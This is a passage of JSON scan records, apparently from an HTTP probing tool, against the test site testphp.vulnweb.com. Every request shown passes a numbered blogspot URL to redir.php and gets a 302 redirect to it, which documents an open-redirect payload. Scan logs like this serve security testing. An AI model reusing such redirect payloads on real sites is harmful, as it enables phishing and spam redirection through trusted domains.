":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.600178291Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1522.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1522.blogspot.com/management.html\",\"location\":\"http://seonews1522.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1522.blogspot.com/management.html\",\"time\":\"338.984442ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.715953262Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1523.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1523.blogspot.com/management.html\",\"location\":\"http://seonews1523.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1523.blogspot.com/management.html\",\"time\":\"342.529534ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.7587388Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1525.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1525.blogspot.com/management.html\",\"location\":\"http://seonews1525.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1525.blogspot.com/management.html\",\"time\":\"352.309729ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.811044144Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1528.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1528.blogspot.com/management.html\",\"location\":\"http://seonews1528.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1528.blogspot.com/management.html\",\"time\":\"344.098841ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.866482997Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1529.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1529.blogspot.com/management.html\",\"location\":\"http://seonews1529.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1529.blogspot.com/management.html\",\"time\":\"354.098486ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:35.94424625Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1530.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1530.blogspot.com/\",\"location\":\"http://seonews1530.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1530.blogspot.com/\",\"time\":\"348.833055ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:36.020133659Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1531.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1531.blogspot.com/\",\"location\":\"http://seonews1531.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1531.blogspot.com/\",\"time\":\"343.860676ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:36.127411362Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1531.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1531.blogspot.com/management.html\",\"location\":\"http://seonews1531.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1531.blogspot.com/management.html\",\"time\":\"342.938576ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:39.275408817Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1532.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1532.blogspot.com/management.html\",\"location\":\"http://seonews1532.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1532.blogspot.com/management.html\",\"time\":\"346.896365ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:39.489695537Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1533.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1533.blogspot.com/\",\"location\":\"http://seonews1533.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1533.blogspot.com/\",\"time\":\"343.250027ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:39.535203746Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1534.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1534.blogspot.com/\",\"location\":\"http://seonews1534.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1534.blogspot.com/\",\"time\":\"356.443253ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:39.578044703Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1535.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1535.blogspot.com/\",\"location\":\"http://seonews1535.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1535.blogspot.com/\",\"time\":\"347.064717ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:39.981767852Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1535.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1535.blogspot.com/management.html\",\"location\":\"http://seonews1535.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1535.blogspot.com/management.html\",\"time\":\"346.262738ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:40.38640466Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1537.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1537.blogspot.com/\",\"location\":\"http://seonews1537.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1537.blogspot.com/\",\"time\":\"343.192696ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:40.42602207Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1537.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1537.blogspot.com/management.html\",\"location\":\"http://seonews1537.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1537.blogspot.com/management.html\",\"time\":\"350.626864ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:40.609785157Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1540.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1540.blogspot.com/\",\"location\":\"http://seonews1540.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1540.blogspot.com/\",\"time\":\"356.572616ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:41.140891837Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1540.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1540.blogspot.com/management.html\",\"location\":\"http://seonews1540.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1540.blogspot.com/management.html\",\"time\":\"354.894713ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:41.178498583Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1541.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1541.blogspot.com/\",\"location\":\"http://seonews1541.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1541.blogspot.com/\",\"time\":\"343.991926ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:42.908100973Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1542.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1542.blogspot.com/\",\"location\":\"http://seonews1542.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1542.blogspot.com/\",\"time\":\"339.863926ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:44.147947075Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1542.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1542.blogspot.com/management.html\",\"location\":\"http://seonews1542.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1542.blogspot.com/management.html\",\"time\":\"347.984985ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:44.217057704Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1543.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1543.blogspot.com/\",\"location\":\"http://seonews1543.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1543.blogspot.com/\",\"time\":\"356.484864ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:44.547825296Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1543.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1543.blogspot.com/management.html\",\"location\":\"http://seonews1543.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1543.blogspot.com/management.html\",\"time\":\"342.335068ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:45.385901769Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1544.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1544.blogspot.com/\",\"location\":\"http://seonews1544.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1544.blogspot.com/\",\"time\":\"356.182513ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:45.411507456Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1544.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1544.blogspot.com/management.html\",\"location\":\"http://seonews1544.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1544.blogspot.com/management.html\",\"time\":\"352.659996ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:45.465932708Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1546.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1546.blogspot.com/\",\"location\":\"http://seonews1546.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1546.blogspot.com/\",\"time\":\"352.75974ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:45.466166945Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1547.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1547.blogspot.com/\",\"location\":\"http://seonews1547.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1547.blogspot.com/\",\"time\":\"351.307409ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:45.806996023Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1548.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1548.blogspot.com/\",\"location\":\"http://seonews1548.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1548.blogspot.com/\",\"time\":\"362.188681ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:45.825008448Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1549.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1549.blogspot.com/\",\"location\":\"http://seonews1549.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1549.blogspot.com/\",\"time\":\"340.927934ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:45.884017615Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1550.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1550.blogspot.com/\",\"location\":\"http://seonews1550.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1550.blogspot.com/\",\"time\":\"356.079411ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:45.945087982Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1551.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1551.blogspot.com/management.html\",\"location\":\"http://seonews1551.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1551.blogspot.com/management.html\",\"time\":\"344.287577ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:45.945826124Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1552.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1552.blogspot.com/\",\"location\":\"http://seonews1552.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1552.blogspot.com/\",\"time\":\"343.273513ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:46.066759037Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1552.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1552.blogspot.com/management.html\",\"location\":\"http://seonews1552.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1552.blogspot.com/management.html\",\"time\":\"347.686636ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:46.111185461Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1553.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1553.blogspot.com/\",\"location\":\"http://seonews1553.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1553.blogspot.com/\",\"time\":\"348.532999ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:46.158329716Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1554.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1554.blogspot.com/management.html\",\"location\":\"http://seonews1554.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1554.blogspot.com/management.html\",\"time\":\"342.806399ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:46.223076476Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1555.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1555.blogspot.com/\",\"location\":\"http://seonews1555.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1555.blogspot.com/\",\"time\":\"352.83923ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:46.305098012Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1555.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1555.blogspot.com/management.html\",\"location\":\"http://seonews1555.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1555.blogspot.com/management.html\",\"time\":\"358.068204ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:46.370845161Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1556.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1556.blogspot.com/\",\"location\":\"http://seonews1556.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"co